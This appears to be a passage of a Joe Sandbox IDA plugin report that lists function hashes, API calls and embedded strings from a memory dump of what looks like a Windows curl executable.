                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Console$CtrlHandleHandlerMode$AddressFrequencyModulePerformanceProcQuery
                            • String ID:
                            • API String ID: 3163256418-0
                            • Opcode ID: d238add84db87b7ca8e683a0999c2dbb375ea1daa9bddb8dcb47c48b77225cdc
                            • Instruction ID: a129d3cb1471ec94a06e2a51705f9d1fba508236be94ac4fb4a4260ea43cde19
                            • Opcode Fuzzy Hash: d238add84db87b7ca8e683a0999c2dbb375ea1daa9bddb8dcb47c48b77225cdc
                            • Instruction Fuzzy Hash: EF210E25A0C50366F759BB75A8451B4E771AF45726FC88235C83E422E4DFECA454C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$connect to %s port %u failed: %s
                            • API String ID: 0-554012191
                            • Opcode ID: 5452c60582490d62f6a2f60a2103bd731f82c82f25c552f7c5797013b93fe210
                            • Instruction ID: 2c34c3aacba7fe5540cb11fc34342a14c307ee1768ade3034cbfabb5b3ccde2b
                            • Opcode Fuzzy Hash: 5452c60582490d62f6a2f60a2103bd731f82c82f25c552f7c5797013b93fe210
                            • Instruction Fuzzy Hash: E7D1F562E0878261EB10EB2994406BAA770FB45BA8F844335EE7E076D5DFBCE401D790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: BufferConsoleHandleInfoScreenstrtol
                            • String ID: COLUMNS$O
                            • API String ID: 283564500-2358961116
                            • Opcode ID: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
                            • Instruction ID: 5b0e88fec28e2be059f3909a9be063be9602306f47ef2bee921869b9b8ba7cad
                            • Opcode Fuzzy Hash: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
                            • Instruction Fuzzy Hash: FA316F33A0860586EB58AF24E444239B3B4EB54BA4F944335EA7D467D4DFBCD590C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorIoctlLastsetsockopt
                            • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                            • API String ID: 1819429192-3022933585
                            • Opcode ID: d80fc1cefa104c438a7b93679a951798409771616211c00dff60a569a790e7f6
                            • Instruction ID: da339849718942aba107848c656c0b1e4979ef0e5763e01c5adaa14283c25482
                            • Opcode Fuzzy Hash: d80fc1cefa104c438a7b93679a951798409771616211c00dff60a569a790e7f6
                            • Instruction Fuzzy Hash: B621857360868186E710DF55E0403AEF7A4FB88BD5F504139EA5E87A99DFBCD144CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1D9A56D
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A5C1
                              • Part of subcall function 00007FF7F1D93434: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0 ref: 00007FF7F1D93474
                              • Part of subcall function 00007FF7F1D93434: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D93483
                              • Part of subcall function 00007FF7F1D93434: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1D934A1
                              • Part of subcall function 00007FF7F1DA50D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,00007FF7F1D99CBC), ref: 00007FF7F1DA50F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __acrt_iob_func$CloseCreateErrorHandleLastSnapshotToolhelp32_mbscmp
                            • String ID: %s$--dump-module-paths$curl: (%d) Windows-specific init failed.
                            • API String ID: 1780716894-2839915597
                            • Opcode ID: 0fe53f441c98d8002a2398a50a46728eb4756e223cf1d0cbf20bbae4f14ae567
                            • Instruction ID: d472a38fdb336b7ecd96ae079163b3f5d1f909516cca0665ae675bf8b650f360
                            • Opcode Fuzzy Hash: 0fe53f441c98d8002a2398a50a46728eb4756e223cf1d0cbf20bbae4f14ae567
                            • Instruction Fuzzy Hash: 72015B16B09A5791EB68BB16A4042B8A371AF45BC0FC58035CD3D477DAEFACF845C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLastselect
                            • String ID:
                            • API String ID: 215497628-0
                            • Opcode ID: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
                            • Instruction ID: de6621af866a824b589617737bf1815f5347a56e033a4ccc84b3dbafb6becb65
                            • Opcode Fuzzy Hash: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
                            • Instruction Fuzzy Hash: 25910922A1C68146EB2AAB24D4003B9E3B5FF50B98F944A34EA3D467C4DFBCD945C3D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1DAB021
                            • __swprintf_l.LIBCMT ref: 00007FF7F1DAB168
                              • Part of subcall function 00007FF7F1DBEFB0: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7F1DAAED4), ref: 00007FF7F1DBEFE3
                              • Part of subcall function 00007FF7F1DBEFB0: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1DBEFEE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CloseHandleObjectSingleWait__swprintf_l_time64
                            • String ID: Connection #%ld to host %s left intact$Connection cache is full, closing the oldest one
                            • API String ID: 2773606893-1048602531
                            • Opcode ID: 12916fb7b50737de65a23a16587698c2ac9d0b7e1987a36af3515f9196f06169
                            • Instruction ID: 4b29f73fc9c664c8a4a1509133a857b84513b9de270592ffc6f804652916afbd
                            • Opcode Fuzzy Hash: 12916fb7b50737de65a23a16587698c2ac9d0b7e1987a36af3515f9196f06169
                            • Instruction Fuzzy Hash: C2B17222A0968291EB58FB25D4503BDA3B4FB85B45F885136DE2E073D6CFBCE451C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00007FF7F1DC6E61
                            • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00007FF7F1DC6C33
                            • ** Resuming transfer from byte position %I64d, xrefs: 00007FF7F1DC6C20
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: fflush
                            • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                            • API String ID: 497872470-664487449
                            • Opcode ID: f1db6afceb1888d4b9d963c74150ea30138d871b5fe00a9ed913ba3e9cd6ddac
                            • Instruction ID: 1b09b9d2268af3b2a7890ceb306231a11fcdd360b815cab437c7637e486bcd3c
                            • Opcode Fuzzy Hash: f1db6afceb1888d4b9d963c74150ea30138d871b5fe00a9ed913ba3e9cd6ddac
                            • Instruction Fuzzy Hash: 3491B222B04B9A81EF41EB5AE6446E9B7B8FB84BC8F810432EE1D17795DF78D541C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: inet_pton
                            • String ID: Hostname %s was found in DNS cache$localhost
                            • API String ID: 1350483568-3522642687
                            • Opcode ID: 4ee8407b60bbade95cf76e8e2920379f7cc77a306ebc8ec6573fc6f92ed525ef
                            • Instruction ID: b1d5a72205819f4dce8da18def7901ba7f19d33eab6086b5d1da72046bfac727
                            • Opcode Fuzzy Hash: 4ee8407b60bbade95cf76e8e2920379f7cc77a306ebc8ec6573fc6f92ed525ef
                            • Instruction Fuzzy Hash: 0781D221B0878A80FB15AB2698407B9A6B1AF45BC4F884835DD2D1B7D5DFBCE441CBF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1DA3968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
                              • Part of subcall function 00007FF7F1DA3968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD
                              • Part of subcall function 00007FF7F1DB1D84: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DA8
                              • Part of subcall function 00007FF7F1DB1D84: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DB1DC4
                              • Part of subcall function 00007FF7F1DB1D84: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DB1DD7
                              • Part of subcall function 00007FF7F1DB1D84: LoadLibraryExA.KERNELBASE ref: 00007FF7F1DB1E22
                            • GetProcAddress.KERNELBASE ref: 00007FF7F1DCC4CF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
                            • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                            • API String ID: 2293913591-3788156360
                            • Opcode ID: 78805f3da44b9d1599e01779b04495847ddc0bdd6b49cabce248c99673dea04a
                            • Instruction ID: 20459d6f9c83551be349a5cc5d6a6dd60ef88acd3939be1277c26c21e77b7af8
                            • Opcode Fuzzy Hash: 78805f3da44b9d1599e01779b04495847ddc0bdd6b49cabce248c99673dea04a
                            • Instruction Fuzzy Hash: 8C01D220E0EB4391FB18BB18A941374E3A1AF15385FC48838D56E422E1EFFCB159C2E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                            • API String ID: 0-3891197721
                            • Opcode ID: 69532c37bb6105c319ca78b87632617471ba0575841cc5b9c97e0b770e2f2e62
                            • Instruction ID: 0b9bbc6e5774bdc4e113f1b6695e7b693e7b6469b5f97a42840e674290fcfafb
                            • Opcode Fuzzy Hash: 69532c37bb6105c319ca78b87632617471ba0575841cc5b9c97e0b770e2f2e62
                            • Instruction Fuzzy Hash: CF719E72F097028AEB14EB65E4806AC73B5BB487A8F814235DE3D577D4DF78E40993A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                            • API String ID: 0-3791222319
                            • Opcode ID: 39f216f3763744a07aa75342d715392161864aaf3d59f6ecbabe224144740d57
                            • Instruction ID: 64e434511cb380077bc9c219ab4edfcac4644f6b090af78ba138811830a8922f
                            • Opcode Fuzzy Hash: 39f216f3763744a07aa75342d715392161864aaf3d59f6ecbabe224144740d57
                            • Instruction Fuzzy Hash: C351C622B1964285EB55FB269844279B361FB84BD4FE48634DE2E433D5EFBCE400D790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1D9EDEC: _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1D9EE38
                              • Part of subcall function 00007FF7F1D9A9B4: _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA14
                              • Part of subcall function 00007FF7F1D9A9B4: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA72
                              • Part of subcall function 00007FF7F1D9A9B4: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA8D
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F5D8
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F5E7
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F5F6
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F604
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$_close_time64fflushfputs
                            • String ID:
                            • API String ID: 3931261741-0
                            • Opcode ID: 130d4a768d0c290c2e4020ca026117d3e08ce7ec069cc47156d902afadf02fd4
                            • Instruction ID: d3482254b4097e2b76d2a25bdc3347ba64cb550c190917c07216caca0dc15788
                            • Opcode Fuzzy Hash: 130d4a768d0c290c2e4020ca026117d3e08ce7ec069cc47156d902afadf02fd4
                            • Instruction Fuzzy Hash: 92218122719B9286EB5AEF11E0047B9A7B4FB48B84F854531CE2D4B395EFBCE04583D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0$no transfer performed
                            • API String ID: 0-3908658408
                            • Opcode ID: 8cd2335b6e3f82647d859969877286a3d7b2cdaa466d46e85c2084e360f30dc0
                            • Instruction ID: edbaef1e676baf3a91ab21f990dcb4be2c0f0cf6fcd51c17fcb20605221e9ba4
                            • Opcode Fuzzy Hash: 8cd2335b6e3f82647d859969877286a3d7b2cdaa466d46e85c2084e360f30dc0
                            • Instruction Fuzzy Hash: AD318756A0C54345FB68BA6254903BADBB0AF81B80FC40071DD6DCA6D5DFBCE44683E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLastSleepgetsockopt
                            • String ID:
                            • API String ID: 3033474312-0
                            • Opcode ID: 8b98add12cb3ebfd2e4ce57eefd2cc2bce7051c84efd4f3bf6b85bc5aa5583f4
                            • Instruction ID: dd811fb90dc0c5c7dff45518a6979ab870e8be329c357420b89886b1f7dbd04c
                            • Opcode Fuzzy Hash: 8b98add12cb3ebfd2e4ce57eefd2cc2bce7051c84efd4f3bf6b85bc5aa5583f4
                            • Instruction Fuzzy Hash: 9E01713360864393E754DB16E40427AE3B0AB4D785F648438EA5A47AE8DFBDE4448B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: %s%s
                            • API String ID: 1992661772-3252725368
                            • Opcode ID: 329eb3bc379dc0d14727fea0264f8e85c18507a3dbbaabb6cc615e145aa37896
                            • Instruction ID: 6c8fb710071a35efa13f4cc2539a4bb59b15f9bec7d51d03a7948b4416940d20
                            • Opcode Fuzzy Hash: 329eb3bc379dc0d14727fea0264f8e85c18507a3dbbaabb6cc615e145aa37896
                            • Instruction Fuzzy Hash: AE319E21A1964655FB65AB2AA45027AA7E4BF48B84FC80035DD2E473E4EFBCE54183A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ioctlsocketsocket
                            • String ID:
                            • API String ID: 416004797-0
                            • Opcode ID: a775c54eaf3f6829044519add8cdc98c4e607f709a7dc7f3796e535a40421cd9
                            • Instruction ID: 9aae083e7c25e9e7b6d1b964b8d1d46a54951c27283a0137fa1f0fbf400e9c73
                            • Opcode Fuzzy Hash: a775c54eaf3f6829044519add8cdc98c4e607f709a7dc7f3796e535a40421cd9
                            • Instruction Fuzzy Hash: 48415B32B056859AEB68DF29D4407A8B3B0FB58B58F488135CA6E473C4DF78E494DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: closesocketsocket
                            • String ID:
                            • API String ID: 2760038618-0
                            • Opcode ID: fc11ebed4c9472233ec0ab33e2941643a747099faefea1a2dff5437e727a53a5
                            • Instruction ID: f85cadbc169853efe655ed461c559af2d1c05dda1831b862d84d3bc15fb04979
                            • Opcode Fuzzy Hash: fc11ebed4c9472233ec0ab33e2941643a747099faefea1a2dff5437e727a53a5
